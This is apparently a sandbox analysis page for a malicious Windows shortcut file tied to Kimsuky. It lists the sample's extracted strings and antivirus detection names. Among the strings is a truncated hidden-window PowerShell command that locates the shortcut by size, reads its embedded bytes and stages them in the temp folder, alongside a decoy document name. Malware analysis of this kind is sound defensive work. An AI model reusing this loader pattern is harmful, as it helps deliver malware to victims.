Static | ZeroBOX
No static analysis available.
%windir%\system32\cmd.exe
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
_rels/.rels
bmO6P
word/_rels/document.xml.rels
word/document.xml
4<V%@C7
cDys'-
\uc" o!oAM
$PP: %
"3L>&!
ijWNDH
JmBi3A
p#7#/wR5
7Zm#G2
word/numbering.xml
word/styles.xml
[Content_Types].xml
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/numbering.xmlPK
word/styles.xmlPK
[Content_Types].xmlPK
vmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsd
AType: Text Document
Size: 5.23 KB
Date modified: 01/02/2020 11:23
/c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = '%temp%';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $
.\123.docx
%windir%\system32\cmd.exe
Antivirus Signature
Bkav Clean
Lionic Trojan.WinLNK.Boxter.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Dropper.tx
ALYac Trojan.Agent.LNK.Gen
Malwarebytes Clean
Zillya Trojan.Kimsuky.Script.13
Sangfor Clean
K7AntiVirus Trojan ( 0001140e1 )
K7GW Trojan ( 0001140e1 )
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Scr.Mallnk!gen13
ESET-NOD32 LNK/Kimsuky.I
TrendMicro-HouseCall Clean
Avast LNK:Agent-EW [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Multi.Agent.gen
BitDefender Heur.BZC.YAX.Boxter.781.B552B7AC
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.YAX.Boxter.781.B552B7AC
Tencent Clean
TACHYON Clean
Sophos Troj/LnkObf-T
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.YAX.Boxter.781.B552B7AC
TrendMicro Clean
FireEye Heur.BZC.YAX.Boxter.781.B552B7AC
Emsisoft Trojan.PowerShell.Gen (A)
SentinelOne Static AI - Suspicious LNK
GData Heur.BZC.YAX.Boxter.781.B552B7AC
Jiangmin Clean
Varist LNK/ABTrojan.DOVH-
Avira Clean
Antiy-AVL Clean
Kingsoft Script.Troj.CMDLnk.22143
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.YAX.Boxter.781.B4AAC4E8
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Multi.Agent.gen
Microsoft Trojan:Win32/Kimsuky.HNAR!MTB
Google Detected
AhnLab-V3 Downloader/LNK.Generic
Acronis Clean
McAfee Clean
MAX malware (ai score=100)
VBA32 Trojan.Link.Crafted
Zoner Clean
Rising Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Yandex Clean
Ikarus Trojan.LNK.Kimsuky
MaxSecure Clean
Fortinet LNK/Kimsuky.GOSU!tr
BitDefenderTheta Clean
AVG LNK:Agent-EW [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Trojan:Win/Kimsuky.I
No IRMA results available.